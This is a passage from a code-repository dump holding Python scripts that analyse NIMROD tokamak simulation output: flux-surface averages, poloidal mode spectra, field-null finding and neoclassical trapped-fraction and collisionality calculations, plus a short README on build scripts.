y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth\n dy(3)=dq\n dy(4)=dtheta\n '''\n\n #self.mmax=fargs.get(\"mmax\")\n\n\n b0=np.array(cfsa.get_b0(evalnimrod,rzc,flag))\n b = evalnimrod.eval_field('b', rzc, dmode=0)\n\n\n rr =rzc[0]\n q=self.qpsi(fargs.get('psi'))\n jac=rr*q/b0[2]\n dy[4]=dy[2]/jac #dtheta\n for ii, im in enumerate(self.ifour):\n oset = ii * (4*self.mmax+1)\n reb=np.real(b[:,im+1])\n imb=np.imag(b[:,im+1])\n rBePsi=rr*(reb[1]*b0[0]-reb[0]*b0[1])\n iBePsi=rr*(imb[1]*b0[0]-imb[0]*b0[1])\n for im in range(self.mmax):\n nmth=-(self.mmax-im)*y[4] #negative m theta\n pmth=(im+1)*y[4] #positive m theta\n dy[5+im+oset]=(rBePsi*np.cos(nmth)-iBePsi*np.sin(nmth))*dy[2]\n dy[6+self.mmax+im+oset]=(rBePsi*np.cos(pmth)-iBePsi*np.sin(pmth))*dy[2]\n dy[6+2*self.mmax+im+oset]=-(rBePsi*np.sin(nmth)+iBePsi*np.cos(nmth))*dy[2]\n dy[6+3*self.mmax+im+oset]=-(rBePsi*np.sin(pmth)+iBePsi*np.cos(pmth))*dy[2]\n dy[5+self.mmax+oset]=rBePsi*dy[2]\n return dy\n\n\n def get_rho_q(self,q):\n try:\n return interp1d(self.q,self.rhon, kind='cubic',fill_value=\"extrapolate\")(q)\n except:\n print(f\"The safety factor {q} is not it the domain\")\n raise\n\n def get_field_rho(self,field,rhon):\n try:\n return interp1d(self.rhon,field, kind='cubic')(rhon)\n except:\n print(f\"Problem evaluitng field at rhon={rhon}\")\n raise\n\n def calculate(self,rzo=None,rzx=None,nsurf=150,eqflag=0,fargs={},**kwargs):\n mi=kwargs.get(\"mi\",3.3435860e-27)\n qe=kwargs.get(\"qe\",1.609e-19)\n self.ifour=fargs.get(\"ifour\")\n self.mmax=fargs['mmax']\n self.nfour=len(fargs['ifour'])\n self.setprofiles=True\n\n #first call to fsa is to calcualte q\n cevalnimrod=ceval.EvalCompNimrod(self.dumpfile,fieldlist='nvptbj')\n dvar, yvar, contours = cfsa.FSA(cevalnimrod, rzo, self.dummy_fsa, 1, \\\n nsurf=nsurf,depvar='eta',dpow=0.5,rzx=rzx,flag=eqflag,normalize=True, \\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n #unevaluated interpoate\n self.qpsi=interp1d(dvar[2,:iend], dvar[7,:iend], kind='cubic')\n\n #second call to fsa is to calcualte b_ms ans psi_mn\n neq=1+self.nfour*(4*self.mmax+1)\n dvar,yvar,contours = cfsa.FSA(cevalnimrod, rzo, self.surfmn_int, neq, \\\n nsurf=nsurf,depvar='eta', dpow=0.5,rzx=rzx,flag=eqflag,normalize=False,\\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n\n bmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n bcmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n bsmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n for ii in range(self.nfour):\n oset = ii * (4*self.mmax+1)\n bcmn[ii,:,:]= yvar[1+oset:2*self.mmax+2+oset,:iend]*(np.pi*2.0)\n bsmn[ii,0:self.mmax,:]=\\\n yvar[2+2*self.mmax+oset:2+3*self.mmax+oset,:iend]*(np.pi*2.0)\n bsmn[ii,self.mmax+1:2*self.mmax+1,:]=\\\n yvar[2+3*self.mmax+oset:2+4*self.mmax+oset,:iend]*(np.pi*2.0)\n bmn=np.sqrt(np.square(bcmn)+np.square(bsmn))\n rhomin=np.min(dvar[1,:iend])\n rhomax=np.max(dvar[1,:iend])\n self.rhon = np.linspace(rhomin,rhomax,200,endpoint=True)\n #dvars\n self.psin=interp1d(dvar[1,:iend], dvar[0,:iend], kind='cubic')(self.rhon)\n self.psi=interp1d(dvar[1,:iend], dvar[2,:iend], kind='cubic')(self.rhon)\n self.vprime=np.pi*2*interp1d(dvar[1,:iend], dvar[6,:iend], kind='cubic')(self.rhon)\n self.q=interp1d(dvar[1,:iend], dvar[7,:iend], kind='cubic')(self.rhon)\n\n self.bcmn=interp1d(dvar[1,:iend],bcmn, kind='cubic')(self.rhon)\n self.bsmn=interp1d(dvar[1,:iend],bsmn, kind='cubic')(self.rhon)\n self.bmn 
=interp1d(dvar[1,:iend],bmn , kind='cubic')(self.rhon)\n\n def get_b0(self,eval_nimrod,rzn,flag,abort=False):\n \"\"\"\n Find b at a given point\n :param eval_nimrod: eval_nimrod class instance\n :param rzn: initial guess for poloidal field null\n :param flag: if 0 only use eq, if 1 add n=0 to eq\n :param abort: raise an exception if true and can't find b\n \"\"\"\n b = eval_nimrod.eval_field('b', rzn, dmode=0)\n b0=np.real(b[:,0])\n if flag==1:\n b0+=np.real(b[:,1])\n if (abort and np.isnan(b0).any()):\n print(b)\n raise Exception('FSA_find_pf_null: Hit wall')\n return b0\n\n def find_pf_null(self,eval_nimrod, rzn, flag=0):\n \"\"\"\n Find a poloidal field null\n :param eval_nimrod: eval_nimrod class instance\n :param rzn: initial guess for poloidal field null\n :param flag: if 0 only use eq, if 1 add n=0 to eq\n \"\"\"\n rzn = np.array(rzn)\n maxsteps=1000\n it=0\n rtol=1.e-8\n drz0=0.125*rzn[0]\n while True:\n b = self.get_b0(eval_nimrod,rzn,flag,abort=False)\n norm0=np.sqrt(b[0]**2+b[1]**2)\n rvn=-rzn[0]*b[1]/norm0\n zvn= rzn[0]*b[0]/norm0\n drz=drz0*(1.0-float(it)/maxsteps)+rtol*rzn[0]\n while True:\n rr=rzn[0]+rvn*drz\n zz=rzn[1]+zvn*drz\n rzng=np.array([rr, zz, 0.0])\n b = self.get_b0(eval_nimrod,rzng,flag,abort=False)\n if not np.isnan(b).any():\n norm=np.sqrt(b[0]**2+b[1]**2)\n if (norm < norm0):\n rzn[:]=rzng[:]\n break\n rr=rzn[0]-rvn*drz\n zz=rzn[1]-zvn*drz\n rzng=np.array([rr, zz, 0.0])\n b = self.get_b0(eval_nimrod,rzng,flag,abort=False)\n if not np.isnan(b).any():\n norm=np.sqrt(b[0]**2+b[1]**2)\n if (norm < norm0):\n rzn[:]=rzng[:]\n break\n drz=drz/2.0\n if (drz/rzn[0] < rtol):\n return rzn # done\n it=it+1\n if it>=maxsteps:\n raise Exception('FSA find_pf_null: No convergence')\n return\n\n def plot(self,pargs={}):\n for im,imode in enumerate(self.ifour):\n self.plot_radial(im,imode,pargs)\n self.plot_surfmn(im,imode,pargs)\n\n def plot_radial(self,ii,imode,pargs={}):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n title=f\"$\\psi$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n ylabel=f\"$\\psi_m$ [mWb]\"\n colorlist = list(mcolors.TABLEAU_COLORS)\n xlabel=r'$\\rho_N$'\n fontsize=18\n if imode==1:\n mlist=range(-4,1)\n elif imode==2:\n mlist=range(-6,-1)\n else:\n mstart=-2*imode\n mlist=range(mstart,mstart+imode+1)\n if 'mlists' in pargs:\n if ii<len(pargs['mlists'][ii]):\n mlist=pargs['mlists'][ii]\n\n for im,this_m in enumerate(mlist):\n this_i = self.get_m_index(this_m)\n if this_i!= None:\n mlbl = \"m = \" + str(this_m)\n tc=colorlist[im%len(colorlist)]\n ax.plot(self.rhon,self.bmn[ii,this_i,:]*1000, color=tc, label=mlbl)\n try:\n qlist=pargs['qlists'][ii]\n except:\n if imode==1:\n qlist=[-4,-3,-2]\n elif imode==2:\n qlist=[-4,-3,-2.5,-2,-1.5]\n elif imode==3:\n qlist=[-3,-2.33, -2,-1.67,-1.33]\n elif imode==4:\n qlist=[-3,-2,-1.75,-1.5,-1.25]\n elif imode==5:\n qlist=[-3,-2,-1.8,-1.6,-1.4,-1.2]\n else:\n qlist=[-4,-3,-2]\n\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(f\"q={qq:.2f} is not in the domain\")\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0,frameon=True,fontsize=fontsize)\n plt.title(title,fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n plt.ylabel(ylabel,fontsize=fontsize)\n plt.tight_layout()\n plt.show()\n\n def plot_surfmn(self,im,imode,surfmn,pargs={}):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n # Set titles and labels\n title=f\"$\\psi$(n={int(imode)}) at 
{self.time*1000:.3f}ms\"\n # set contour levels, i could generalize this further if needed\n levels=301\n vmax=np.amax(self.bmn[im,:,:])*1000\n levels=np.linspace(0,vmax,301)\n cbar_ticks=np.linspace(0,vmax,11)\n # Update plot based on keys in kwargs\n xlabel=\"Poloidal Mode Number m\"\n fontsize=18\n # set up mrange()\n qmin=np.amin(self.q)\n qmax=np.amax(self.q)\n mrange=np.linspace(qmin,qmax)\n #create the surfmn plot\n plt.set_cmap('nipy_spectral')\n m=range(-self.mmax,self.mmax+1)\n mv, rv = np.meshgrid(m, self.rhon, sparse=False, indexing='ij')\n conf=plt.contourf(mv,rv,np.clip(self.bmn[im,:,:]*1000,0,None),levels=levels,vmax=vmax)\n plt.plot(imode*mrange,self.get_rho_q(mrange),c='w')\n plt.title(title,fontsize=fontsize)\n plt.ylabel(r'$\\rho_N$',fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n cbar=fig.colorbar(conf,ticks=cbar_ticks)\n plt.xlim(-self.mmax,self.mmax)\n plt.show()\n\n def get_dumptime(self):\n ''' Open the hdf5 dumpfile read the dump time and dumpstep\n '''\n with h5py.File(self.dumpfile, 'r') as h5file:\n try:\n self.time=h5file[\"dumpTime\"].attrs['vsTime']\n self.step=int(h5file[\"dumpTime\"].attrs['vsStep'])\n except:\n print(f\"Error reading time or step in {self.dumpfile}\")\n raise\n\n def plot_scalar(self,rr,zz,field):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.set_cmap('nipy_spectral')\n conf=plt.contourf(rr,zz,field,corner_mask=False)\n plt.show()\n\n def get_domain(self):\n flag=1\n rmin=1.15\n rmax=2.3\n zmin=-1.25\n zmax=1.10\n npts=30\n nsteps=20\n lastr=np.nan\n cevalnimrod=ceval.EvalCompNimrod(self.dumpfile,fieldlist='nb')\n rzn=np.array([1.76897216, -0.01890963, 0. ])\n print(rzn)\n rzo=self.find_pf_null(cevalnimrod,rzn ,1)\n print(rzo)\n grid=np.meshgrid(np.linspace(rmin,rmax,npts),np.linspace(zmin,zmax,npts))\n grid=np.array(grid)\n print(grid.shape)\n nn=np.zeros([grid.shape[1],grid.shape[2],cevalnimrod.nmodes_peq,4],dtype=np.complex64)\n first=True\n for ir in range(grid.shape[1]):\n for iz in range(grid.shape[2]):\n rr=grid[0,ir,iz]\n zz=grid[1,ir,iz]\n if rr !=lastr:\n for ii in range(nsteps,0,-1):\n trr=rzo[0]+(rr-rzo[0])*(1.0-(ii/np.real(nsteps))**3)\n tzz=rzo[1]+(zz-rzo[1])*(1.0-(ii/np.real(nsteps))**3)\n trzp=np.array([trr,tzz,0.0])\n temp=cevalnimrod.eval_field('n', trzp, dmode=0)\n rzp=np.array([rr,zz,0.0])\n nn[ir,iz,:,:]=cevalnimrod.eval_field('n', rzp, dmode=1)\n lastr=rr\n ngrid =np.ma.masked_invalid(nn)\n print(nn)\n print(grid.shape,ngrid.shape)\n print((1,)+(3,4))\n self.plot_scalar(grid[0,:,:], grid[1,:,:],np.real(ngrid[:,:,3,0]))\n" }, { "alpha_fraction": 0.6158192157745361, "alphanum_fraction": 0.6232344508171082, "avg_line_length": 31.55172348022461, "blob_id": "e4437d46a3ff450490deb8a0a2817c89e5500ada", "content_id": "d74ac300b0d702dd7d7c326923ebabb495c3ce3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2832, "license_type": "no_license", "max_line_length": 88, "num_lines": 87, "path": "/hocradic/hcRunnerFsa.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#\nimport os\nimport h5py\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nfrom shutil import copy2\nimport hcStepFsa as step\nimport nim_timer as nimtime\nimport matplotlib.colors as mcolors\n\n\ndef hcrunner(file_name=None,\n pickle_data=False,\n read_pickle=False,\n args={}):\n\n if not os.path.isfile(file_name):\n print(f\"File {file_name} not found\")\n raise IOError\n\n 
dump_pre=[\"dumpgll\",\"dump\"]\n dump_suf=[\"h5\"]\n pickle_suf=[\"pickle\"]\n pickle_pre=[\"fsapower\"]\n nimrodin=\"nimrod.in\"\n pre=file_name.split('.')[0]\n if pre in dump_pre:\n print(f\"Performing hc analysis from dump file\")\n # check for nimrod.in and hdf5 format\n if not os.path.isfile(nimrodin):\n print(f\"nimrod.in not found\")\n raise IOError\n if not file_name.split('.')[-1] in dump_suf:\n print(f\"dump file is not hdf5 format\")\n raise IOError\n\n hc=step.hcstepfsa(file_name,nimrodin,args['lphi'])\n hc.get_dumptime()\n hc.calculate_power_fsa(nsurf=args['npts'],**args)\n# hc.analyze_power(npts=args['npts'],plot=True)\n# hc.analyze_power_adv(npts=args['npts'],plot=True)\n# hc.print_integrals()\n nimtime.timer.print_times()\n print(hc.step, hc.time)\n\n #pickle data here\n if args['pickle']:\n pfile=pickle_pre[0]+'.'+str(hc.step).zfill(5)+'.'+pickle_suf[0]\n print(f\"writing file {pfile}\")\n with open(pfile,'wb') as file:\n hc.dump(file)\n elif pre in pickle_pre:\n print(\"pickle_pre\")\n hc=step.hcstepfsa(None,None,None)\n hc.load(file_name)\n print(f\"Time: {hc.time}\" )\n # hc.print_integrals()\n else:\n print(f\"File {file_name} is not a recognized file type\")\n raise IOError\n\n #plot data here\n if args['plot']:\n hc.interpolate_fsa(radial='rhon',npts=200,fsa=False)\n hc.default_plot()\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Ho-Cradick FSA runner.')\n parser.add_argument('file',help='file name')\n parser.add_argument('--plot', action='store_true',help='shows plots')\n parser.add_argument('--pickle', action='store_true',help='pickle data')\n parser.add_argument('--npts', '-n', type=int, default=100,help='number of surfaces')\n parser.add_argument('--lphi', '-l', type=int, default=5, help='lphi')\n parser.add_argument('--nmax', type=int, default=5, help='namx')\n parser.add_argument('--dpow', '-d', type=float, default=0.5, help='dpow')\n parser.add_argument('--read', '-r', action='store_true',help='read pickled data')\n args = vars(parser.parse_args())\n print(args)\n hcrunner(file_name=args['file'],args=args)#\\\n #pickle_data=args['pickle'],read_pickle=args['read'],args=args)\n" }, { "alpha_fraction": 0.7301037907600403, "alphanum_fraction": 0.7508650422096252, "avg_line_length": 47, "blob_id": "fda6b51b65a7f4fb0305a4287953d0d76e4f36f9", "content_id": "db08f16c7192c18d94c7bd4a9103b2f2df26bb88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 289, "license_type": "no_license", "max_line_length": 104, "num_lines": 6, "path": "/bilderScripts/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "## bilderScripts\nThese are scripts that I use for building NIMROD on my macs when using bilder\n\n### Files\n - **darwin.gcc820:** my hacked machine file for building nimrod with gcc820\n - **run_bilder.sh:** a simple script that evokes bilder from the command line with options that I like.\n " }, { "alpha_fraction": 0.47154998779296875, "alphanum_fraction": 0.5227112770080566, "avg_line_length": 37.886314392089844, "blob_id": "54b13aab370f002a0e337956c4135e758c734368", "content_id": "8363060b2339c4e2869d6cb74541e97ec0fb77a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18471, "license_type": "no_license", "max_line_length": 143, "num_lines": 475, "path": "/random/muPlots_rev.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nfrom 
plot_nimrod import PlotNimrod as pn\nimport f90nml\nimport numpy as np\nfrom eval_nimrod import *\nfrom field_class import *\nfrom fsa import *\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d,splev,UnivariateSpline\nimport os\nimport argparse\n\ndef readRaw(rawFile):\n datadict={}\n with open(rawFile, 'r') as f:\n while True:\n dataname = f.readline()\n if not dataname:\n break\n dataname = dataname.split()\n datalen = int(dataname[0])\n dataname = dataname[2]\n npdata=np.zeros((3,datalen),np.float)\n for line in range(datalen):\n datastr=f.readline().split()\n npdata[0][line]=float(datastr[0])\n npdata[1][line]=float(datastr[1])\n npdata[2][line]=float(datastr[2])\n datadict[dataname]=npdata\n return datadict\n\ndef basefsa(rzc, y, dy, eval_nimrod, fdict):\n '''\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n Set neq to number of outputs in FSA call\n and fill dy[4:4+neq]\n '''\n isurf=fdict.get('isurf')\n bextrema=fdict['bextrema']\n bigr=fdict['bigr']\n n = eval_nimrod.eval_field('n', rzc, dmode=0, eq=2)\n dy[4] = n[0]*dy[2] # ne\n dy[5] = dy[4] # nd #### n is not a vector for me\n dy[6] = 0.\n ti = eval_nimrod.eval_field('ti', rzc, dmode=0, eq=2)\n dy[7] = ti[0]*dy[2] # ti\n te = eval_nimrod.eval_field('te', rzc, dmode=0, eq=2)\n dy[8] = te[0]*dy[2] # te\n bf = eval_nimrod.eval_field('b', rzc, dmode=1, eq=2)\n B = Vector(bf, rzc, torgeom=True, dmod=1)\n bsq = B.dot(B,dmod=0).data\n dy[9] = bsq*dy[2] # B**2\n dy[10] = (B.hat(dmod=0).dot(grad(B.mag())).data)**2*dy[2] # (b.grad(|B|))**2\n dy[11] = rzc[0]*bf[2]*dy[2] # R B_Phi\n bmag = np.sqrt(bsq)\n bextrema[0,isurf] = min(bextrema[0,isurf], bmag)\n bextrema[1,isurf] = max(bextrema[1,isurf], bmag)\n bigr[isurf] = max(bigr[isurf], rzc[0])\n vf = eval_nimrod.eval_field('v', rzc, dmode=0, eq=2)\n dy[12] = vf[2]*dy[2]/rzc[0] # omega\n dy[13] = (vf[0]*bf[0]+vf[1]*bf[1])*dy[2]/np.sqrt(bf[0]*bf[0]+bf[1]*bf[1]) # Kpol\n return dy\n\ndef trapfsa(rzc, y, dy, eval_nimrod,fdict):\n '''\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n Set neq to number of outputs in FSA call\n and fill dy[4:4+neq]\n '''\n bf = eval_nimrod.eval_field('b', rzc, dmode=0, eq=2)\n B = Vector(bf, rzc, torgeom=True, dmod=0)\n bmag = B.mag().data\n bave=fdict['bave']\n nlam=fdict['nlam']\n lam=fdict['lam']\n rzo=fdict['rzo_copy']\n dy[4:4+nlam] = np.sqrt(1.0 - lam[:]*bmag/bave)\n dy[4+nlam:4+2*nlam] = dy[2]/(dy[4:4+nlam])\n dy[4:4+nlam]*=dy[2] #note dy[4:4+nlam] is used in above calc\n dy[4+2*nlam] = dy[2]*bmag/bave\n dy[4+2*nlam+1] = dy[2]*np.sqrt((rzc[0]-rzo[0])**2+(rzc[1]-rzo[1])**2)\n return dy\n\n# load dump file\ndef neoclassical_calculator(dumpfile):\n dumpfile = 'dumpgll.00000.h5'\n nml = f90nml.read('nimrod.in')\n gmt = nml['grid_input']['geom']\n if gmt == 'tor':\n gmt=True\n else:\n gmt=False\n eval_nimrod = EvalNimrod(dumpfile, fieldlist='nvptbj') #, (e not in dumpfile coord='xyz')\n\n\n rzo = find_pf_null(eval_nimrod, [1.7, -0.2, 0])\n\n md=3.3435860e-27\n me=9.1093837015e-31\n #%zc=6\n #%mc=1.9944235e-26\n echrg=1.609e-19\n kboltz=echrg\n kb=1.609e-19\n eps0=8.85418782e-12\n #%\n nsurf = 150 # FSA surfaces\n bextrema = np.zeros([2,nsurf])\n bextrema[0,:] = np.inf # min\n bextrema[1,:] = -np.inf # max\n bigr = np.zeros([nsurf])\n bigr[:] = -np.inf # max\n #%\n\n################################################################################\n# Calculate basic fsa quantitites\n################################################################################\n dpow=1.0\n fsafilename = 'fsa.npz'\n if 
os.path.exists(fsafilename):\n fsaDict = np.load(fsafilename)\n dvar = fsaDict['arr_0']\n yvars = fsaDict['arr_1']\n contours = fsaDict['arr_2']\n bextrema = fsaDict['arr_3']\n bigr = fsaDict['arr_4']\n else:\n# dvar, yvars, contours = FSA(eval_nimrod, rzo, basefsa, 10, nsurf=nsurf, \\\n# depvar='eta', dpow=dpow, rzx=[1.3, -1.14, 0],\n# bextrema=bextrema, bigr=bigr)\n dvar, yvars, contours = FSA(eval_nimrod, rzo, basefsa, 10, nsurf=nsurf, \\\n depvar='eta', dpow=dpow,\n bextrema=bextrema, bigr=bigr)\n fsaArr = [dvar, yvars, contours, bextrema, bigr]\n np.savez(fsafilename,*fsaArr)\n\n # Determine where the FSA failed\n iend=-1\n while np.isnan(yvars[:,iend]).any():\n iend -= 1\n iend += yvars.shape[1]+1\n\n################################################################################\n# Calcualte trapped and passing fractions\n################################################################################\n trapfilename = 'trap.npz'\n if os.path.exists(trapfilename):\n trapDict = np.load(trapfilename)\n f_pass = trapDict['arr_0']\n eps = trapDict['arr_1']\n else:\n # Arrays for passing/trapped fractions\n # ind 0 - Helander and Sigmar Eq. 11.24\n # f_t = 1 - (3/4)*int_0^(Bave/Bmax) dlambda lambda/<SQRT(1-lambda*B/Bave)>\n # ind 1 - Lin-Liu and Miller (1995)\n # f_tl = 1 - (3/4)*int_0^(Bave/Bmax) dlambda lambda*<1/SQRT(1-lambda*B/Bave)>\n # ind 2 - f_tu from Lin-Liu and Miller (1995)\n # f_tu = 1 - (3/4)*int_0^(Bave/Bmax) dlambda lambda/SQRT(1-lambda*<B/Bave>)\n # int 3 - f_te from inverse aspect ratio as in B5\n # f_c ~ 1 - 1.46*sqrt(eps) + 0.46*eps*sqrt(eps)\n f_pass = np.zeros([4,iend])\n eps = np.zeros([iend])\n # integrate from 0 to bmax\n for ii in range(iend):\n nlam = 100\n lam, weights = np.polynomial.legendre.leggauss(nlam)\n bave = np.sqrt(yvars[5,ii]) # sqrt(<B^2>)\n lam += 1\n lam *= bave/(2.0*bextrema[1,ii])\n weights *= bave/(2.0*bextrema[1,ii])\n rzp = [contours[0,0,ii], contours[1,0,ii], 0]\n intgr, contour = FSA(eval_nimrod, rzo, trapfsa, 2*nlam+2, nsurf=1,\n depvar='eta', rzp=rzp, bave=bave, nlam=nlam,\n lam=lam, rzo_copy=rzo)\n f_pass[0,ii] = 0.75*np.sum(weights*lam/intgr[0:nlam]) #Callen Eqn B5\n f_pass[1,ii] = 0.75*np.sum(weights*lam*intgr[nlam:2*nlam])\n f_pass[2,ii] = 0.75*np.sum(weights*lam/np.sqrt(1.0-lam*intgr[2*nlam]))\n eps[ii] = intgr[2*nlam+1]/rzo[0]\n f_pass[3,ii] = 1 + (-1.46 + 0.46*eps[ii])*np.sqrt(eps[ii])\n print(ii,dvar[1,ii],f_pass[:,ii])\n trapArr = [f_pass,eps]\n np.savez(trapfilename,*trapArr)\n f_trap = 1.0 - f_pass[:,:]\n\n################################################################################\n# Plot fsa quantities\n################################################################################\n ne = yvars[0,:iend]\n nd = yvars[1,:iend]\n ti = yvars[3,:iend]\n te = yvars[4,:iend]\n fsabsq = yvars[5,:iend]\n fsabdgrBsq = yvars[6,:iend]\n rbphi = yvars[7,:iend]\n omega = yvars[8,:iend]\n kpol = yvars[9,:iend]\n rhon = dvar[1,:iend]\n psi = dvar[2,:iend]\n psix = dvar[2,-1]\n q = np.fabs(dvar[7,:iend])\n bigr = bigr[:iend]\n #%\n\n rhoofq=interp1d(q,rhon)\n rhoq2=rhoofq(2)\n rhoq3=rhoofq(3)\n rhoq4=rhoofq(4)\n print(rhoq2,rhoq3,rhoq4)\n\n #pn.plot_scalar_line(None, q, flabel=r'q',\n # xvar=rhon, xlabel=r'$\\rho_N$', ylabel='',legend_loc='upper left')\n\n #%\n # Plot trapped fraction\n fig_size = [12,6.75]\n fig,ax = plt.subplots(figsize=fig_size)\n ax.axvline(rhoq2, ls=':')\n ax.axvline(rhoq3, ls=':')\n ax.axvline(rhoq4, ls=':')\n pn.plot_scalar_line(None, f_trap[0,:], flabel=r'$f_t$',\n f2=f_trap[3,:], f2label=r'$f_{t}$ approx',\n 
xvar=rhon, xlabel=r'$\\rho_N$', ylabel=r'$f_t$',\n style='varied',legend_loc='upper left',ax=ax)\n\n ft=interp1d(rhon,f_trap[0,:])\n ft_approx=interp1d(rhon,f_trap[3,:])\n print(f\"q={2} f_t = {ft(rhoq2)} f_t approx = {ft_approx(rhoq2)}\")\n print(f\"q={3} f_t = {ft(rhoq3)} f_t approx = {ft_approx(rhoq3)}\")\n print(f\"q={4} f_t = {ft(rhoq4)} f_t approx = {ft_approx(rhoq4)}\")\n\n # Plot fsa quants\n #pn.plot_scalar_line(None, fsabsq, flabel=r'\\langle B^2 \\rangle',\n # xvar=rhon, xlabel=r'\\rho_N', ylabel='',legend_loc='upper left')\n #pn.plot_scalar_line(None, fsabdgrBsq, flabel=r'\\langle(\\mathbf{b}\\cdot\\nabla B)^2\\rangle',\n # xvar=rhon, xlabel=r'\\rho_N', ylabel='',legend_loc='upper right')\n fsa_approx = eps**2/(2*rzo[0]**2*q**2)\n #pn.plot_scalar_line(None, fsabdgrBsq/fsabsq,\n # flabel=r'\\langle(\\mathbf{b}\\cdot\\nabla B)^2\\rangle/\\langle B^2 \\rangle',\n # f2=fsa_approx, f2label='\\epsilon^2/(2 R_0^2 q^2)',\n # xvar=rhon, xlabel=r'\\rho_N', ylabel='m^{-2}',legend_loc='upper right')\n\n fig_size = [12,6.75]\n fig,ax = plt.subplots(figsize=fig_size)\n ax.axvline(rhoq2, ls=':')\n ax.axvline(rhoq3, ls=':')\n ax.axvline(rhoq4, ls=':')\n pn.plot_scalar_line(None, eps, flabel=r'$\\epsilon$',\n xvar=rhon, xlabel=r'$\\rho_N$', ylabel='',\n legend_loc='upper right',ax=ax)\n\n eps_int=interp1d(rhon,f_trap[0,:])\n print(f\"q={2} $\\epsilon$ = {eps_int(rhoq2)}\")\n temp = 1.46 * np.sqrt(.242)-0.46*np.power(.242,1.5)\n print(f\"using epsilon b f_t = {temp} at q=2\")\n #%# computed quantities\n #%### nustar ###\n #%\n\n for species in ['ion','electron']:\n lnLambda=24.-np.log(np.sqrt(ne/10**6)/te)\n sqrt2 = np.sqrt(2)\n if species == 'ion':\n z = 0.0\n ms=md\n ts=ti\n ns=nd\n nu_coef = 4.0 * np.sqrt(np.pi) * echrg**4 * lnLambda \\\n /((4.0 * np.pi * eps0)**2 * kb**1.5 * 3.0 * np.sqrt(md))\n eta_coef = 5/(sqrt2*12.0)*(205.0/(48.0*sqrt2))/(89/48) #z_star =0\n nustauss = 1.0/sqrt2\n elif species == 'electron':\n z = 1.0\n ms=me\n ts=te\n ns=ne\n nu_coef = 4.0 * np.sqrt(2*np.pi) * echrg**4 * lnLambda \\\n /((4.0 * np.pi * eps0)**2 * kb**1.5 * 3.0 * np.sqrt(me))\n\n eta_coef = 5/12.0 * \\\n (17./4.*z**2+205*z/(48*sqrt2))/ \\\n (2*z**2+301*z/(48*sqrt2)+89/48)\n nustauss = z\n else:\n print(\"species unknown\")\n raise ValueError\n nu_s=nu_coef * ns/np.sqrt(ts**3)\n vt_s = np.sqrt(ts*kb/ms)\n lambda_s = vt_s/nu_s\n eta00_s = ms*ns*nu_s*lambda_s**2 # A17\n\n D = 1.2 * (2* np.power(z,2) + 301/(48.*sqrt2)*z+89./48.)\n\n\n\n\n # plot parallel viscosity as a diffusivity\n # pn.plot_scalar_line(None, eta00_s/(md*nd), flabel=r'\\eta^s_{00}/(m_d n_d)',\n # xvar=rhon, xlabel=r'\\rho_N', ylabel='m^2/s', legend_loc='upper right')\n\n omegat_s = vt_s/(rzo[0]*q) # B10\n nustar_s = f_trap[0,:]/(2.92*f_pass[0,:]) * nu_s*omegat_s/vt_s**2 * fsabsq/fsabdgrBsq # B11\n nustar_s_aprx = nu_s*rzo[0]*q/(eps**(1.5)*vt_s) #\n #%\n\n\n # plot nustar\n if species=='ion':\n flabel=r'$\\nu_{*i}$'\n else:\n flabel=r'$\\nu_{*e}$'\n fig,ax = plt.subplots(figsize=fig_size)\n ax.axvline(rhoq2, ls=':')\n ax.axvline(rhoq3, ls=':')\n ax.axvline(rhoq4, ls=':')\n ax.axhline(y=1.0, ls='--',color='k')\n ax.set_ylim([0,10])\n pn.plot_scalar_line(None, nustar_s, flabel=flabel,\n f2=eps**(-1.5), f2label=r'$\\epsilon^{-3/2}$',\n xvar=rhon, xlabel=r'$\\rho_N$', ylabel='',\n style='varied',legend_loc='upper right',ax=ax)\n\n nut=interp1d(rhon,nustar_s)\n nut_approx=interp1d(rhon,nustar_s_aprx)\n print(f\"q={2} nu_* = {nut(rhoq2)} nu_* approx = {nut_approx(rhoq2)}\")\n print(f\"q={3} nu_* = {nut(rhoq3)} nu_* approx = {nut_approx(rhoq3)}\")\n 
